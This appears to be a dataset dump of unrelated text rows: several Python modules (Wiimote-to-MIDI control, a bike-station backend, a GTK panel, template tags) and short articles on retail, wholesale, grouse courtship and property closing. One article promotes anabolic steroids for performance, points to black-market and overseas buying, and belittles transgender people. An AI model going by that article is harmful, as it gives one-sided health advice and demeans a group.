text
stringlengths 29
850k
|
|---|
#!/usr/bin/python
import cwiid
import sys
import time
import pypm
from txosc import osc as OSC
from txosc import sync as SYNC
# Wiimote button bitmasks as they appear in cwiid button-state words.
# A report's state value is the OR of all currently pressed buttons.
btn_A = 0x0008
btn_one = 0x0002
btn_two = 0x0001
btn_left = 0x0100
btn_right = 0x0200
btn_up = 0x0800
btn_down = 0x0400
btn_minus = 0x0010
btn_plus = 0x1000
btn_home = 0x0080
btn_shoot = 0x0004  # presumably the B/trigger button -- TODO confirm
class MIDISender:
    """Fades channel volumes and triggers jingles on a PortMidi output.

    Status bytes: 0xb0 is a MIDI Control Change, 0x90/0x80 are
    Note On/Off (standard MIDI, channel 1).
    """

    def __init__(self,device):
        # Scan all PortMidi devices for an *output* whose name matches.
        self.midi_out = None
        for id in range(pypm.CountDevices()):
            interf,name,inp,outp,opened = pypm.GetDeviceInfo(id)
            if (outp == 1 and name == device):
                self.midi_out = pypm.Output(id,0)
                break
        if self.midi_out == None:
            raise Exception("No output device "+device+" found ...")

    def mute(self,channel):
        # Ramp the controller value from 100 down to 2 (~50ms) for a soft
        # fade. NOTE(review): `channel` is used as the CC *controller
        # number* (second data byte), not the MIDI channel -- confirm.
        print "muting", channel
        for v in range(100,0,-2):
            self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
            time.sleep(0.001)

    def unmute(self,channel):
        # Reverse ramp, 0 up to 98; range() is half-open so it never quite
        # reaches 100 -- presumably close enough for the mixer. TODO confirm.
        print "unmuting", channel
        for v in range(0,100,2):
            self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
            time.sleep(0.001)

    def play_jingle(self, n):
        # Short 100ms note pulse on note number `n`.
        print "playing jingle", n
        self.midi_out.Write([[[0x90,n,127],pypm.Time()]])
        time.sleep(0.1)
        self.midi_out.Write([[[0x80,n,0],pypm.Time()]])

    def stop_jingles(self):
        # Pulse controller 126; the receiving software presumably maps it
        # to "stop all jingles" -- TODO confirm.
        print "stopping jingles"
        self.midi_out.Write([[[0xb0,126,127],pypm.Time()]])
        time.sleep(0.1)
        self.midi_out.Write([[[0xb0,126,0],pypm.Time()]])
        # self.midi_out.Write([[[0xb0,channel,0],pypm.Time()]])
class OSCSender:
    """Minimal OSC/UDP client for driving a DAW transport remotely."""

    def __init__(self, host="localhost", port=3819):
        # Port 3819 is presumably the DAW's OSC listener -- TODO confirm.
        self.sender = SYNC.UdpSender(host, port)

    def _simple_msg(self, msg):
        """Send a one-address OSC message carrying no arguments."""
        message = OSC.Message(msg)
        self.sender.send(message)

    def add_marker(self):
        self._simple_msg("/add_marker")

    def rec_prepare(self):
        # Invokes a user-defined editor script action (slot 2).
        message = OSC.Message("/access_action", "Editor/script-action-2")
        self.sender.send(message)

    def play(self):
        self._simple_msg("/transport_play")

    def stop(self):
        self._simple_msg("/transport_stop")
# Module-level singletons shared by all wiimote handler classes below.
midi_sender = MIDISender("Midi Through Port-0")
osc_sender = OSCSender()
class WiiButtonState(object):
    """Tracks per-button wiimote state and dispatches edge-triggered
    (press, release) callbacks registered in ``button_funcs``."""

    def __init__(self):
        # Per-button state keyed by bitmask. Starts as False; after the
        # first event each entry holds the masked int (0 or the bit).
        self.button_state = dict.fromkeys(
            (btn_A, btn_one, btn_two, btn_left, btn_right, btn_up,
             btn_down, btn_minus, btn_plus, btn_home, btn_shoot),
            False)
        # Bitmask -> (on_press, on_release) pair of callables.
        self.button_funcs = {}

    def callback(self, messages, time):
        """cwiid message callback: forward only button reports."""
        for kind, payload in messages:
            if kind == cwiid.MESG_BTN:
                self.buttonEvent(payload)

    def buttonEvent(self, state):
        """Diff `state` against the stored state and fire callbacks."""
        for mask, previous in self.button_state.items():
            current = state & mask
            if current == previous:
                continue
            self.button_state[mask] = current
            funcs = self.button_funcs.get(mask)
            if funcs is None:
                continue
            on_press, on_release = funcs
            if current:
                on_press()
            else:
                on_release()
class MutingWii(WiiButtonState):
    """Wiimote whose 'shoot' button mutes a mixer channel while held.

    `self.device` (the cwiid.Wiimote) is attached later by
    make_connections(); LED1 is lit while muted.
    """

    def __init__(self,mutingChannel):
        super(MutingWii,self).__init__()
        # Controller number passed to MIDISender.mute/unmute.
        self.mutingChannel = mutingChannel
        # Press fades the channel out, release fades it back in.
        self.button_funcs[btn_shoot] = (self.mute,self.unmute)

    def mute(self):
        self.device.led = cwiid.LED1_ON
        midi_sender.mute(self.mutingChannel)

    def unmute(self):
        self.device.led = 0
        midi_sender.unmute(self.mutingChannel)
class MasterWii(MutingWii):
    """Wiimote with transport/jingle controls on top of channel muting.

    LEDs signal the last action (LED2 jingle, LED3 record-prepare,
    LED4 marker); releasing any mapped button turns LEDs off.
    """

    def __init__(self,mutingChannel):
        super(MasterWii,self).__init__(mutingChannel)
        self.button_funcs[btn_one] = (self.jingle1_play,self.leds_off)
        self.button_funcs[btn_two] = (self.jingle2_play,self.leds_off)
        self.button_funcs[btn_home] = (self.rec_prepare,self.leds_off)
        self.button_funcs[btn_A] = (self.set_mark,self.leds_off)
        self.button_funcs[btn_up] = (self.play,self.leds_off)
        self.button_funcs[btn_down] = (self.stop,self.leds_off)

    def jingle1_play(self):
        print "Jingle1 play"
        self.device.led = cwiid.LED2_ON
        midi_sender.play_jingle(0)

    def jingle2_play(self):
        print "Jingle2 play"
        self.device.led = cwiid.LED2_ON
        midi_sender.play_jingle(1)

    def jingles_stop(self):
        # NOTE(review): not bound to any button above -- dead code? confirm.
        midi_sender.stop_jingles()

    def rec_prepare(self):
        print "Recplay"
        self.device.led = cwiid.LED3_ON
        osc_sender.rec_prepare()

    def play(self):
        osc_sender.play()

    def stop(self):
        osc_sender.stop()

    def set_mark(self):
        print "Set mark"
        self.device.led = cwiid.LED4_ON
        osc_sender.add_marker()

    def leds_off(self):
        # Shared release handler for all mapped buttons.
        self.device.led = 0
def do_nothing():
    """No-op placeholder for buttons that have no assigned action."""
    return None
execfile('device_config')
def make_connections(conns):
    """Try to connect every configured wiimote not yet in `conns`.

    `devices` comes from device_config (id -> WiiButtonState instance).
    On success the wiimote is switched to button reports, wired to the
    handler's callback, and its id appended to `conns`. Returns `conns`
    (which is also mutated in place).
    """
    for id,instance in devices.items():
        if id in conns:
            continue
        print "Connecting", id,
        try:
            wiimote = cwiid.Wiimote(id)
            print "success",
            wiimote.rpt_mode = cwiid.RPT_BTN
            print "report buttons",
            wiimote.mesg_callback = instance.callback
            instance.device = wiimote
            wiimote.enable(cwiid.FLAG_MESG_IFC)
            conns.append(id)
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt /
            # SystemExit; consider narrowing to `except Exception`.
            print "failed"
    return conns
if __name__ == "__main__":
    # Poll forever so wiimotes that drop out or pair late are
    # (re)connected on the next pass.
    conns = []
    while True:
        make_connections(conns)
        time.sleep(1)
|
What are the best legal steroids on earth? This is a very common question, but for many of you, it may be a question you didn't even know was possible. It is often inaccurately assumed that anabolic steroids are outright illegal, but the truth is something rather different. In many countries around the world, to obtain anabolic steroids you only need to visit your local pharmacy. In countries like this, purchasing anabolic steroids is no different from buying Aspirin or a roll of toilet paper. Then we have countries like the United States; countries that have extremely strict anabolic steroid laws. In the U.S., anabolic steroids are classified as Schedule III controlled substances by way of the Steroid Control Act of 1990, later enhanced by the Steroid Control Act of 2004. By this legislation, it is illegal to purchase or possess anabolic steroids without a prescription, and to obtain a prescription you must have a viable medical need. There are many reasons one might obtain a prescription, and if they do they will have the best legal steroids on earth.
If you want the best legal steroids, you're going to need a purpose that is deemed legal; assuming you live in the United States. For years, the most common reasons for obtaining such a prescription was suffering from a severe muscle wasting disease, cancer and aids were both primary. Burn victims are also commonly prescribed, and interestingly enough those who wish to live a transgender lifestyle. In any case, performance enhancement is not deemed a legitimate medical need; it is a desire and one not protected by the law. Of course, the desire to live a transgender lifestyle is not a need, it is a desire, but this is an argument best served for another day. While the above mentioned were for years the only way to obtain a prescription, in recent years other means have been made available, and rightfully so. Millions of men the world over suffer from low testosterone and even total androgen deficiency; in the U.S. alone it is estimated more than five million men suffer from low testosterone, with another twenty-five million or more suffering from Andropause. If you suffer from any of these conditions, and many men have no idea they do, you can easily obtain a prescription for some of the best legal steroids money can buy. Further, because you'll have the best of the best, and legally so, no one can deny you the ability to enjoy the performance boost held within.
Many assume the only legal steroids available are of a pure testosterone nature; it is true; these will be the most common and some of the best legal steroids of all. While various testosterone blends are the most common, there are other anabolic steroids that can aptly be labeled the best legal steroids obtainable with a prescription. Again, testosterone itself is the most common, and perhaps the most important steroid of all, but there are many fine options. In the U.S., the best legal steroids include: • Anadrol (Oxymetholone) – A potent DHT derived anabolic steroid. Used to treat severe muscle wasting conditions and severe osteoporosis. Rarely used for androgen deficiency with the exception of extreme cases. • Anavar (Oxandrolone) – A mild DHT derived anabolic steroid. Commonly prescribed to treat muscle wasting conditions, osteoporosis and combating corticosteroid buildup. Can be used for androgen deficiencies but somewhat rare. • Deca-Durabolin (Nandrolone-Decanoate) – A 19-nor anabolic steroid, used to treat muscle wasting conditions and Renal Disease. Commonly used to increase hemoglobin levels where needed and in recent years a common combatant of Andropause. • Halotestin (Fluoxymesterone) – A Testosterone derivative prescribed for severe androgen deficiency. In any case, this will be the rarest of all prescribed legal steroids that make up the best legal steroids as it can be quite harsh. • Testosterone – The father of all anabolic steroids, the most commonly prescribed in the U.S. is Testosterone-Cypionate. Other common forms include Testosterone-Enanthate, Testosterone-Propionate and to a lesser degree Sustanon-250 and Testosterone-Suspension. Other forms are available as well, but the best of the best include the previously mentioned. In any case, this is the most commonly prescribed anabolic steroid, as it is perfect for every condition in-which anabolic steroids might be prescribed. 
• Winstrol (Stanozolol) – A DHT derived anabolic steroid prescribed for the treatment of angioedema. Can be prescribed for some specific androgen deficient issues, but is a bit rare in this regard.
If you live in the U.S., as you can see, while obtaining the best legal steroids is possible it can at times be a bit difficult. In any case, if you obtain a prescription you will not be given true performance level doses, and if performance is the desire you're going to have to seek out other options. For this reason, many and by many we mean over six-million in the U.S. alone purchase anabolic steroids for the purpose of performance and on the black market. This is an option, but in the name of legality, it is not the best one. If performance is the goal, and if you want the best legal steroids money can buy you'll always be best served by going to another country to take care of your supplemental needs. There are numerous countries around the world where you can do this, and within the safety of the law.
|
# -*- coding: utf-8 -*-
# Copyright(C) 2013 dud
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.backend import Module, BackendConfig
from weboob.capabilities.base import StringField
from weboob.capabilities.gauge import CapGauge, GaugeSensor, Gauge, GaugeMeasure, SensorNotFound
from weboob.tools.value import Value
from weboob.tools.ordereddict import OrderedDict
from .browser import VelibBrowser
__all__ = ['jcvelauxModule']

# Sensor type id -> human-readable label; insertion order defines the
# order sensors are attached to each gauge.
SENSOR_TYPES = OrderedDict(((u'available_bikes', u'Available bikes'),
                            (u'available_bike_stands', u'Free stands'),
                            (u'bike_stands', u'Total stands')))

# Cities selectable in the backend config (plus the special "ALL").
CITIES = ("Paris", "Rouen", "Toulouse", "Luxembourg", "Valence", "Stockholm",
          "Goteborg", "Santander", "Amiens", "Lillestrom", "Mulhouse", "Lyon",
          "Ljubljana", "Seville", "Namur", "Nancy", "Creteil", "Bruxelles-Capitale",
          "Cergy-Pontoise", "Vilnius", "Toyama", "Kazan", "Marseille", "Nantes",
          "Besancon")
class BikeMeasure(GaugeMeasure):
    """Gauge measure whose repr shows the numeric level for debugging."""

    def __repr__(self):
        # The original hardcoded the parent name 'GaugeMeasure'; report
        # the actual class so subclass instances are identifiable.
        return '<%s level=%d>' % (type(self).__name__, self.level)
class BikeSensor(GaugeSensor):
    # Geographic position of the bike station, stored as strings.
    longitude = StringField('Longitude of the sensor')
    latitude = StringField('Latitude of the sensor')
class jcvelauxModule(Module, CapGauge):
    """Weboob backend exposing city-bike station availability as gauges.

    Each station becomes a Gauge carrying one sensor per SENSOR_TYPES
    entry, preloaded with its latest measure.
    """

    NAME = 'jcvelaux'
    DESCRIPTION = (u'City bike renting availability information.\nCities: %s' %
                   u', '.join(CITIES))
    MAINTAINER = u'Herve Werner'
    EMAIL = 'dud225@hotmail.com'
    VERSION = '1.1'
    LICENSE = 'AGPLv3'

    BROWSER = VelibBrowser

    STORAGE = {'boards': {}}

    CONFIG = BackendConfig(Value('city', label='City', default='Paris',
                                 choices=CITIES + ("ALL",)))

    def __init__(self, *a, **kw):
        super(jcvelauxModule, self).__init__(*a, **kw)
        # Lazy cache: lowercase city name -> contract name, filled by
        # _fetch_cities() on first use.
        self.cities = None

    def _make_gauge(self, info):
        """Build a Gauge from a raw station dict."""
        gauge = Gauge(info['id'])
        gauge.name = unicode(info['name'])
        gauge.city = unicode(info['city'])
        gauge.object = u'bikes'
        return gauge

    def _make_sensor(self, sensor_type, info, gauge):
        """Build a BikeSensor of `sensor_type` attached to `gauge`.

        Sensor ids are '<type>.<gauge id>' (parsed back in
        _get_sensor_by_id).
        """
        sensor = BikeSensor('%s.%s' % (sensor_type, gauge.id))
        sensor.gaugeid = gauge.id
        sensor.name = SENSOR_TYPES[sensor_type]
        sensor.address = unicode(info['address'])
        sensor.longitude = info['longitude']
        sensor.latitude = info['latitude']
        sensor.history = []
        return sensor

    def _make_measure(self, sensor_type, info):
        """Build a measure holding the station's current count for
        `sensor_type`."""
        measure = BikeMeasure()
        measure.date = info['last_update']
        measure.level = float(info[sensor_type])
        return measure

    def _parse_gauge(self, info):
        """Turn a raw station dict into a Gauge with one sensor per
        sensor type, each carrying its latest value."""
        gauge = self._make_gauge(info)
        gauge.sensors = []
        # Renamed from `type` (original shadowed the builtin).
        for sensor_type in SENSOR_TYPES:
            sensor = self._make_sensor(sensor_type, info, gauge)
            sensor.lastvalue = self._make_measure(sensor_type, info)
            gauge.sensors.append(sensor)
        return gauge

    def _contract(self):
        """Configured city, or None when 'ALL' is selected (no filter)."""
        contract = self.config.get('city').get()
        if contract.lower() == 'all':
            contract = None
        return contract

    def iter_gauges(self, pattern=None):
        """Yield station gauges, optionally filtered by a
        case-insensitive substring of the station or city name."""
        stations = self.browser.get_station_list(contract=self._contract())
        if pattern is None:
            for jgauge in stations:
                yield self._parse_gauge(jgauge)
        else:
            lowpattern = pattern.lower()
            for jgauge in stations:
                gauge = self._parse_gauge(jgauge)
                if (lowpattern in gauge.name.lower()
                        or lowpattern in gauge.city.lower()):
                    yield gauge

    def iter_sensors(self, gauge, pattern=None):
        """Yield sensors of `gauge` (a Gauge instance or a gauge id),
        optionally filtered by a case-insensitive name substring."""
        if not isinstance(gauge, Gauge):
            gauge = self._get_gauge_by_id(gauge)
            if gauge is None:
                raise SensorNotFound()
        if pattern is None:
            for sensor in gauge.sensors:
                yield sensor
        else:
            lowpattern = pattern.lower()
            for sensor in gauge.sensors:
                if lowpattern in sensor.name.lower():
                    yield sensor

    def get_last_measure(self, sensor):
        """Return the latest measure for `sensor` (instance or id)."""
        if not isinstance(sensor, GaugeSensor):
            sensor = self._get_sensor_by_id(sensor)
        if sensor is None:
            raise SensorNotFound()
        return sensor.lastvalue

    def _fetch_cities(self):
        """Populate self.cities (lowercase city -> contract name) once."""
        if self.cities:
            return
        self.cities = {}
        # Original reused `jcontract` for both the list and the loop
        # variable; use distinct names for clarity.
        for jcontract in self.browser.get_contracts_list():
            for city in jcontract['cities']:
                self.cities[city.lower()] = jcontract['name']

    def _get_gauge_by_id(self, gauge_id):
        """Fetch and parse one station, or None if unknown."""
        jgauge = self.browser.get_station_infos(gauge_id)
        if jgauge:
            return self._parse_gauge(jgauge)
        return None

    def _get_sensor_by_id(self, sensor_id):
        """Resolve a '<type>.<gauge id>' sensor id to its sensor.

        Raises SensorNotFound when the gauge is unknown; falls through
        to an implicit None when the gauge has no matching sensor
        (callers check for None).
        """
        _, gauge_id = sensor_id.split('.', 1)
        gauge = self._get_gauge_by_id(gauge_id)
        if not gauge:
            raise SensorNotFound()
        for sensor in gauge.sensors:
            if sensor.id.lower() == sensor_id.lower():
                return sensor
|
ToyWatch has popped up at London jewellery store Elkin with a temporary shop for the festive sales period.
Elkin has installed dedicated ToyWatch cabinets at its store in London’s Covent Garden and has added the brand’s signage to its windows.
As well as the cabinet displays, ToyWatch models are also shown in the shop on wooden hand models along with the store’s jewellery.
Outside of the temporary festive ToyWatch shop, Elkin does not sell any watches but instead specialises solely in its own collections of jewellery.
The ToyWatch pop-up store will run at Elkin until December 18.
Elkin was founded by Eliisa Makin, who had previously worked as a fashion stylist before setting up the jewellery brand.
|
#!/usr/bin/env python
# Copyright 2012 Tomasz Kontusz
#
# This file is part of Spanel.
#
# Spanel is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Spanel is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Spanel. If not, see <http://www.gnu.org/licenses/>.
import argparse
import logging
import sys
import threading
import gtk
import gobject
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from utils import Enum, GdkLock
# setting DEBUG for pre-main initialization, it will be changed in main()
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)

# Panel height in pixels.
height = 16

# Screen edge the panel docks to.
Positions = Enum(('TOP', 'BOTTOM'))
class PanelWindow(gtk.Window):
    """Dock-type GTK window spanning the screen width that hosts widgets.

    Reserves its screen space via the _NET_WM_STRUT window-manager hint
    so maximized windows do not cover the panel.
    """

    def __init__(self, position=Positions.TOP, widgets=()):
        """Create the panel at `position` and pack `widgets`.

        `widgets` is an iterable of (widget, pack_kwargs) pairs. The
        default is an immutable () instead of the original mutable [].
        """
        super(PanelWindow, self).__init__(gtk.WINDOW_TOPLEVEL)
        self.set_default_size(gtk.gdk.screen_width(), height)
        self.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DOCK)

        self._box = gtk.HBox()
        self.add(self._box)
        self.setup_widgets(widgets)
        self.show_all()

        for w, _ in widgets:  # TODO: create widget protocol
            if hasattr(w, 'on_visible'):
                w.on_visible()

        # NOTE(review): main() may pass position=None, which matches
        # neither branch, so the panel is neither moved nor given a
        # strut -- confirm this is intended.
        # NOTE(review): EWMH orders struts [left, right, top, bottom];
        # [0, height, 0, 0] therefore sets the *right* strut -- verify.
        if position == Positions.TOP:
            self.move(0, 0)
            self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
                gtk.gdk.PROP_MODE_REPLACE, [0, height, 0, 0])
        elif position == Positions.BOTTOM:
            self.move(0, gtk.gdk.screen_height()-height)
            self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
                gtk.gdk.PROP_MODE_REPLACE, [0, 0, 0, height])

    def setup_widgets(self, widgets):
        """Pack each (widget, kwargs) pair into the panel's HBox,
        defaulting to expand=False unless the pair overrides it."""
        default_kwargs = {
            'expand': False
        }
        for widget, w_kwargs in widgets:
            kwargs = default_kwargs.copy()
            kwargs.update(w_kwargs)
            self._box.pack_start(widget, **kwargs)
def main():
    """Parse arguments, configure logging, build the panel and run GTK.

    Returns 1 on an unsupported log level; otherwise blocks in the GTK
    main loop.
    """
    logger.info('loading configuration')
    import conf

    debug_levels = ['DEBUG', 'INFO', 'WARNING', 'ERROR']
    parser = argparse.ArgumentParser(
        description="Simple panel written in Python for holding widgets")
    parser.add_argument('--verbosity', '-v', dest='verbosity',
                        choices=debug_levels, default=None)
    args = parser.parse_args()

    # Command line beats conf.VERBOSITY, which beats the INFO default.
    level = args.verbosity or getattr(conf, 'VERBOSITY', 'INFO')
    if level not in debug_levels:
        logger.critical('Log level %s not supported!', level)
        return 1
    # Fix: logging.basicConfig() already ran at import time, so calling
    # it again was a silent no-op. Adjust the root logger level directly.
    logging.getLogger().setLevel(level)

    logger.info('creating panel')
    app = PanelWindow(position=getattr(conf, 'POSITION', None),
                      widgets=getattr(conf, 'WIDGETS', []))

    logger.info('starting main loop')
    gtk.gdk.threads_init()
    with GdkLock():
        gtk.main()
if __name__ == '__main__':
    # NOTE(review): main() can return 1 but the exit code is discarded;
    # consider sys.exit(main()).
    main()
|
What’s new in wholesale for 2019?
With Brexit reaching its conclusion (allegedly), several big names settling into new roles and an array of other key issues on the horizon, the next 12 months are big ones for wholesale. But what do some of the industry’s top names expect to be the big talking points for the year ahead?
“With the minimum wage set to increase and the implications of Brexit still uncertain, there’s no denying that 2019 will be tough. However, the falling high-street rents, business rates relief for small businesses, duty rises on wine and tobacco, and minimum pricing on alcohol will help to make the market a more level playing field, which is a huge positive for independent retailers.
“Next year is all about the aftermath of Brexit, although at this point we’re still in the dark as to where we’ll stand in April. If there’s no deal with the EU, we’ll have to negotiate the complicated transition to global WTO trading, which will inevitably include higher tariffs on some goods. Once the decision is known, we’ll be pushing for clarity on movement of goods and labour, and any departure from EU regulations and standards.
“There’s plenty of other regulation to be aware of too. A rise in the National Living Wage in April will hit some wholesalers hard and they’ll benefit less from business rates relief than their customer base. The new duty bands on white ciders will affect many own brands, and Minimum Unit Pricing of alcohol products will come into force in Wales.
“We’ll learn about calorie-labelling requirements due in 2020, and may see a ban on sales of energy drinks to children. On the environmental front, we face some potentially very onerous changes to Packaging Recovery Notes and the first of what’s likely to be numerous restrictions on the use of unrecyclable plastics.
“I recently returned to the industry as Sugro’s MD after 18 months with the co-op movement. The amount of change and consolidation has been immense – not only with Booker and Tesco, but also the major multiples now seeing themselves as wholesalers to fuel capital-light sales expansion as customer trends move away from their big-box model.
“A lot of these changes started in 2018 but will take greater shape and form in 2019. Wholesale is not defined as narrowly as before. This poses challenges for suppliers and wholesalers as channels blur.
“Over the years, we’ve moved from being a foodservice wholesaler to a true business partner to independent caterers. We offer them key services from catering supplies to online-ordering websites and even customer credit via the JJ Mastercard.
“This month, we’re celebrating our 30th anniversary, which is a tremendous achievement for an independent family business, and we plan to be around to support our customers for many years to come. That’s why one of the biggest focuses for us in 2019 will be to continue with our environmental push. This year, we made some great leaps, which included reduced idling in our vehicles by 70% that resulted in a 2% reduction in carbon emissions across our entire fleet. Solar energy now accounts for 13% of all energy used by our London branches and all our sites are MSC certified. We are encouraging the use of biodegradable and compostable packing with our new Eco-Packing range and will continue to grow our vegetarian and vegan offer.
“I certainly think there’ll be an advancement in digital business. I don’t mean just the percentage of transactions, but the level of influence in digital on retailers’ behaviour will increase. I’d also imagine that we’ll see this extended into the foodservice and on-trade sectors, which is quite limited at the moment. So some of the best practice we do about range and execution that are commonplace will start to happen in in those sectors too.
“There’ll also be pressure on cost, regardless of what happens with Brexit. There’ll be more consolidation of effort to take out cost and that’s something Unitas Wholesale wants to do too.
“The short-term challenges for the foodservice industry are significant, and we’ve seen national restaurant operators and independent businesses alike struggle. Brexit dominates, with challenges on labour availability, food inflation, and lower sterling rates.
“However, we remain positive in the medium-term outlook and are investing accordingly. We’ve been planning for a range of scenarios to ensure that Brakes is best placed to help our customers meet the challenges that are to come.
“Consumer demand for eating out, particularly in areas such as healthier fast food and food to go, remains strong and vegan and free-from choice expands rapidly – giving growth opportunities. Consumer consciousness of social and environmental issues, food provenance and lifestyle choices influencing meal occasions continues to rise.
Originally published 11:06am January 15, 2019 , updated 2:27pm January 16, 2019 .
|
from cgi import escape
def preformat(text):
    """Return `text` coerced to str with '&', '<' and '>' HTML-escaped.

    Replaces the deprecated cgi.escape (removed with the cgi module in
    Python 3.13) with html.escape; quote=False matches cgi.escape's
    default of leaving double quotes untouched.
    """
    from html import escape as _escape  # local: top-level import is cgi
    return _escape(str(text), quote=False)
class TagWrapper(str):
    """str subclass that wraps its text in an HTML tag.

    Subclasses set `tag` (and optionally `attributes`, a dict rendered
    onto the opening tag); instantiating with text yields the wrapped
    string.
    """

    tag = None
    attributes = None

    @classmethod
    def _wrap(cls, text):
        """Return `text` surrounded by the class's open/close tags."""
        attrib = ''
        if cls.attributes:
            pairs = ['{}="{}"'.format(key, value)
                     for key, value in cls.attributes.items()]
            attrib = ' ' + ' '.join(pairs)
        return '<{tag}{attrib}>{text}</{tag}>'.format(
            tag=cls.tag, attrib=attrib, text=text)

    def __new__(cls, text):
        return super().__new__(cls, cls._wrap(text))
class Italic(TagWrapper):
    tag = 'i'

class Oblique(Italic):
    # Rendered identically to Italic; kept as a distinct type name.
    pass

class Bold(TagWrapper):
    tag = 'b'

class Light(TagWrapper):
    # NOTE(review): '<l>' is not a standard HTML element -- presumably
    # consumed by a custom renderer; confirm.
    tag = 'l'

class Underline(TagWrapper):
    tag = 'u'

class Superscript(TagWrapper):
    tag = 'sup'

class Subscript(TagWrapper):
    tag = 'sub'

class SmallCaps(TagWrapper):
    # No dedicated small-caps tag exists, so emit a styled <span>.
    tag = 'span'
    attributes = {'style': 'font-variant:small-caps;'}
class Bibliography(str):
    """str subclass joining entries into a CSL-style HTML bibliography.

    Each item is wrapped in a csl-entry div; the whole list is enclosed
    in a csl-bib-body div, one line per element.
    """

    bib_prefix = '<div class="csl-bib-body">'
    bib_suffix = '</div>'
    item_prefix = ' <div class="csl-entry">'
    item_suffix = '</div>'

    def __new__(cls, items):
        entries = [cls.item_prefix + str(item) + cls.item_suffix
                   for item in items]
        lines = [cls.bib_prefix] + entries + [cls.bib_suffix]
        return super().__new__(cls, '\n'.join(lines))
|
I recently headed to Nebraska with a good friend and awesome photographer to witness the annual lekking courtship of the Greater Prairie Chicken and the Sharp-tailed Grouse. We had to be good friends and very tolerant of each other as we spent ten mornings in small blinds in close proximity. We did very well, I must say! I have photographed our local Greater Sage Grouse on its lek on numerous occasions but wanted to see these two other birds displaying in the sandhills of Nebraska. It was quite a sight and as always: I want more!!
The Greater Prairie Chicken male displays a pair of pinnae (ear like feathers) along with an orange and purple air sac as it produces a soft, low, hooting sound. They also do a short hop-flight with a cackle that sounds as though you may have just entered a jungle. They will battle each other for top spot in the lek. The bird that holds the top spot has most of the breeding honors. They will display to each other casually, but the real “ruckus” happens when a female enters the courtship arena. Suddenly, all of the males are hooting and dancing, sparring with each other as necessary, truly strutting their stuff. The hen wanders through the lek with an indifference to all of them, taking in the attention and checking out the merchandise. A spectacular audible and visual sight!
The Sharp-tailed Grouse is less colorful but no less spectacular. These males entertain their hens on the tops of the sand hills. They have a smaller air sac but it is colored a bright purple. They display with wings spread, air sac puffed, and yellow eyebrows raised. Stomping their feet, they will all go into a display position and synchronize their moves with the top male initiating the start. Crazy sounds are made by all consisting of hoots and snapping of tail feathers; as usual a flurry of activity comes into play with the presence of a female.
These two birds are truly something to see on their spring courting arenas. Like a number of our other native birds, their demise will be the loss of habitat. Historically, the grasslands they need have been under siege for a long time, shrinking the available habitat and thus decreasing their numbers. Conservation programs are coming into place and efforts are being made to preserve or restore the native prairies. May enough Americans find these birds worthy of saving!
|
# Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
from django import template
from django.db.models.query import QuerySet
from django.db.models import Model
from search.forms import SearchForm
from videos.models import Video
register = template.Library()
@register.inclusion_tag('search/_search_form.html', takes_context=True)
def search_form(context, form=None, simple=False):
    """Render the search form template, building a fresh SearchForm
    when no (truthy) form was supplied."""
    return {
        'simple': simple,
        'form': form if form else SearchForm(),
    }
@register.simple_tag
def load_related_for_result(search_qs):
    """Prefetch subtitle languages for the videos in a search result.

    Attaches a `langs_cache` list to every video so templates avoid one
    query per video. Items of `search_qs` may be Video model instances
    or search-result wrappers exposing the instance as `.object`.
    Returns '' because a simple_tag's return value is rendered inline.
    """
    #should be fixed in future if result will contain not only Video
    from videos.models import SubtitleLanguage

    # Collect (video id -> video) for all non-empty results.
    videos = []
    for obj in search_qs:
        if not obj:
            # Presumably guards against stale/None search hits -- confirm.
            continue
        if isinstance(obj, Model):
            videos.append((obj.id, obj))
        else:
            # Search-result wrapper: the model instance lives on .object.
            videos.append((obj.object.id, obj.object))
    videos = dict(videos)

    # Lazy queryset: only evaluated by the loop below, and only when
    # there is at least one video.
    langs_qs = SubtitleLanguage.objects.select_related('video', 'last_version').filter(video__id__in=videos.keys())

    if videos:
        for v in videos.values():
            v.langs_cache = []

        # Distribute each language onto its video's cache.
        for l in langs_qs:
            videos[l.video_id].langs_cache.append(l)

    return ''
|
Legal Closing is interpreted as: “Conveyance of title from seller to buyer and the proceeds dispersed to the seller”. In Washington State, closing is considered the day that the deed is recorded in the buyers’ names and the proceeds are paid to the seller. When they can take legal possession of the property depends upon the terms or conditions of the contract.
Different states handle closing procedures in different ways. In Washington, buyers and sellers sign at separate times, typically two to three days prior to the stated closing date. Closings are predominantly handled by escrow companies, although some prefer to use attorneys.
